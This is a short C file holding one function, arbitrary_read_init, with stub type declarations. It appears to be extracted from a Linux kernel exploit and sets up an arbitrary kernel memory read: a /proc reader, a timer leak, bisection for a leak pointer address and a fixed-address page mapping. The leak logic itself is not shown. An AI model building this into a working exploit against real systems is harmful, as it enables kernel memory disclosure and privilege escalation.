
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int PAGE_SIZE ;
 int bisect_leak_ptr_addr () ;
 int cpuinfo_check () ;
 int g_leak_ptr_addr ;
 int g_proc_reader ;
 int info (char*,...) ;
 int leak_setup () ;
 int mmap_fixed (int,int) ;
 int proc_init (int *) ;

__attribute__((used)) static void arbitrary_read_init() {
 info("[.] setting up proc reader\n");
 proc_init(&g_proc_reader);
 info("[~] done\n");

 info("[.] checking /proc/cpuinfo\n");
 cpuinfo_check();
 info("[~] looks good\n");

 info("[.] setting up timer\n");
 leak_setup();
 info("[~] done\n");

 info("[.] finding leak pointer address\n");
 g_leak_ptr_addr = bisect_leak_ptr_addr();
 info("[+] done: %016lx\n", g_leak_ptr_addr);

 info("[.] mapping leak pointer page\n");
 mmap_fixed(g_leak_ptr_addr & ~(PAGE_SIZE - 1), PAGE_SIZE);
 info("[~] done\n");
}
